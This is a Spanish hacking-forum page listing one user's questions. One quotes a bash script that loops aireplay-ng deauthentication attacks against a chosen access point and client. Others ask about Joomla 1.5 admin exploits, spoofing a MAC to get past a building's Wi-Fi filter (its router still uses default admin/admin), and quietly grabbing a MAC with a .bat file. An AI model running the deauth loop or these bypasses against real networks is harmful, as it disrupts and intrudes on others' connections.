elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Temas
Páginas: [1]
1  Programación / Scripting / DUDA script .sh a .vbs en: 10 Febrero 2016, 16:50 pm
Buenas compañeros, creo que este tema debe ir en este apartado ya que como finalidad quiero crear un script en VBS.

Soy usuario de windows y me gustaría portar un script .sh a .vbs para trabajar con comodidad desde windows, no sé si esto será posible pero si alguien más experto puede ayudarme a portarlo o indicarme como hacerlo estaría profundamente agradecido.

El script es el siguiente:

Citar
echo -n -e ‘\E[37;41m'”Enter Interface: “; tput sgr0
read int
echo ‘—>’
echo -n -e ‘\E[37;41m'”Enter Target AP Bssid: “; tput sgr0
read bsid
echo ‘—>’
echo -n -e ‘\E[37;41m'”Enter Target AP channel: “; tput sgr0
read chn
iwconfig $int channel $chn
echo ‘—>’
echo -n -e ‘\E[37;41m'”Enter Target Connected Client: “; tput sgr0
read cli
echo ‘—>’
rm /home/cut.sh &>/dev/null;
echo ”’for (( ; ; ))
do
  aireplay-ng -a ‘$bsid’ -c ‘$cli’ -0 100 ‘$int’
  
done
”’ >> /home/cut.sh
xterm -geometry 70×12-1-1 -T “killing progress” -bg red -e “sh /home/cut.sh”
ACLARO antes de nada que entiendo que tiene rutas y software exclusivo de linux, pero, ¿seria posible realizar algo similar en un entorno windows?
Espero sus respuestas.
2  Sistemas Operativos / Windows / Ayuda: ¿Cómo actualizar mi BIOS? en: 16 Marzo 2015, 12:30 pm
Buenos dias, no sé si este post debe ir aqui (si no es así pido que lo ubiquen correctamente).

Mi Bios está empezando a darme problemas, debo reconocer que ya es vieja (2007) y necesito actualizarla para entre otras cosas bootear desde un USB (la otra razón es que al iniciar el pc me salta una ventana de American Megatrends pidiendome que pulse F2 para continuar, supongo que estará dañada)

He probado mil y una formas para intentar actualizarla pero en la página oficial no aclaran nada, solo un software para "flashear" pero no encuentro ninguna ROM para poder usar en el mismo.

Si sirve de algo... dejo el reporte de Everest sobre mi bios, si es necesario  me lo decís y dejo el de la placa base completa.  

Espero que alguien pueda ayudarme porque me está dando muchos quebraderos de cabeza.

Pd: Añado que es una AMI BIOS de un HP Pavilion a6119.es, es todo lo que sé.

Pd 2: Este es el enlace del software para "flashear": https://www.ami.com/download-license-agreement/?DownloadFile=AMIBIOS_and_Aptio_AMI_Firmware_Update_Utility.zip , también he probado en soporte y nada... no hay manera de encontrar algo útil.

3  Seguridad Informática / Nivel Web / [Duda] Vulnerabilidades Joomla 1.5 en: 2 Febrero 2015, 00:01 am
Tengo una web bajo el software Joomla 1.5 y quisiera saber si hay algún exploit o bug para acceder al panel de administrador o poder modificar la página de algún modo.

He estado buscando en multitud de sitios y hay bugs, pero no he conseguido hacerlos funcionar por mi mismo (como si fuese un atacante hacia mi propia web), por lo que me hace dudar...

Si alguien conoce alguna vulnerabilidad y su correspondiente solución agradecería su ayuda.
4  Comunicaciones / Redes / [DUDA] Cuestión sobre Redes. en: 1 Febrero 2015, 23:23 pm
Buenas, soy relativamente nuevo en este foro, a pesar de ello soy un apasionado de todo lo relacionado con la programación, redes y sistemas.
Aunque tengo escasos conocimientos, si tengo una gran facilidad para aprender y una increíble motivación para lograr mis objetivos.

Sé que en este foro hay gente con amplios conocimientos, y me gustaría que colaboraseis para ayudarme a completar mi objetivo en la medida de lo posible.

Antes de exponer mi problema quisiera aclarar que no soy un cracker, ni un niñato que solo se registra para obtener información y largarse, mi objetivo no es con ningún fin salvo mera curiosidad y solución al problema.

Invito a cualquier moderador a mover este tema a un apartado más conveniente si es necesario e incluso cerrarlo y borrarlo si plantea algún problema.

Planteo la siguiente cuestión (resulta complicada de entender, espero expresarme lo mejor posible):

Partimos de una toma de calle que abastece de internet a un edificio, digamos que este edificio se divide en 2 sub-edificios, A y B.

-En la red Wifi,tanto A como B tienen la misma red Wifi (mediante diferentes routers-amplificadores distribuidos por zonas de A y B). El wifi está abierto, pero solo deja acceder a internet a ciertos ordenadores (suponemos que filtra el acceso por MAC)

Para terminar con la red Wifi, hay otros ordenadores, que suponiendo que hay un filtro de MAC para el acceso, presentan una limitación en cuanto a cantidad de mb descargados, si este limite se supera se bloquea la MAC durante 24 horas.

-En cuanto a la red por cable de ambos edificios,  se puede acceder a internet mediante unas salas de ordenadores repartidas tanto en A como B (conectados por cable, no por wifi), cada sala de ordenadores tiene su propia red lan y acceso a internet, pero por ejemplo el ordenador 1 de la sala 1 puede conectarse con cualquiera de los 12 ordenadores y a internet, pero no puede conectarse con el ordenador 1 de la sala 2.

Cabe destacar que estos ordenadores, están congelados (se pueden descongelar),y se puede acceder al router que gestiona esas conexiones puesto que tienen todo por defecto ( admin / admin ).

Al intentar acceder al apartado de Wifi desde ese router, da una dirección y nombre diferente a la red wifi que comenté antes. Y todas las salas de ordenadores se conectan a ese mismo router.

Sé que resulta complicado de entender, he intentado expresarme lo mejor posible, si surge alguna duda no dudéis en preguntarme e intentaré aclararlo.

Por tanto aqui vienen mis preguntas:

A)¿Resulta sostenible un sistema asi, simplemente para evitar el acceso no autorizado a internet desde el conjunto de edificios?

B)¿Es posible todo este entramado? ¿Si es así alguien podria explicarme como se consigue gestionar?

C)¿Si falseamos una MAC incluida en el filtro en un ordenador ajeno, podriamos acceder a la propia red wifi?

Espero que esta cuestión no resulte demasiado confusa y que puedan resolver mis dudas.


5  Programación / Scripting / Creación .bat (Copiar y pegar salida comando) en: 1 Febrero 2015, 22:38 pm
Buenas, soy nuevo en el foro, llevo ya tiempo moviendome por aqui aunque sin registrarme, y ahora que me ha surgido una duda bastante confusa quiero ver si alguien podría ayudarme.

Quiero crear un archivo .bat que me copie toda la información (a un archivo de texto)que se genere a partir del comando en CMD: ipconfig /all

He estado buscando pero no encuentro ningún comando que me copie toda la información y la exporte a un .txt en la misma dirección del .bat

La finalidad de todo esto es conseguir la dirección MAC del ordenador con apenas un click y sin ser demasiado llamativo (sé que los .bat se pueden ejecutar sin ver los procesos, simplemente sale la ventana negra y se cierra)

Espero que alguien pueda ayudarme

[Editado el nombre a uno más apropiado]
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines